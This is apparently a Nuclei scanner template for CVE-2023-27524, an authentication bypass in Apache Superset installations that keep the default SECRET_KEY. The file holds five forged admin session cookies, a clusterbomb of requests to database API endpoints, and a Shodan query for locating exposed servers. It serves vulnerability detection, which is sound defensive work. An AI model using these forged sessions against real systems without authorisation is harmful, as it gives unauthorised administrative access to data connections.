id: CVE-2023-27524

info:
  name: Apache Superset - Authentication Bypass
  author: DhiyaneshDK,_0xf4n9x_
  severity: high
  description: |
    Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config.
  reference:
    - https://github.com/horizon3ai/CVE-2023-27524
    - https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset-leads-to-remote-code-execution/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-27524
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L
    cvss-score: 8.9
    cve-id: CVE-2023-27524
    cwe-id: CWE-1188
  metadata:
    max-request: 45
    verified: true
    shodan-query: html:"Apache Superset"
  tags: cve,cve2023,apache,superset,auth-bypass

http:
  - raw:
      - |
        GET /api/v1/database/{{path}} HTTP/1.1
        Host: {{Hostname}}
        Cookie: session={{session}}

    payloads:
      path:
        - '1'
        - '2'
        - '3'
        - '4'
        - '5'
        - '6'
        - '7'
        - '9'
        - '10'
      session:
        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.RoFeMf1WLNJXDYslf18x9VGxC0Q'
        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.hKV8XXVcD6lWhTIoWs0CjrSRPQQ'
        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.xtJXBhmJ0k6_oKs8iGhWJK2BjKs'
        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.hRZP41FgqxjaxjJ3WyeIVxyZDng'
        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.6GpaUB9IP9OnG3HHon3XcdzHWhI'
    attack: clusterbomb
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"database_name":'
          - '"configuration_method":'
        condition: and

      - type: status
        status:
          - 200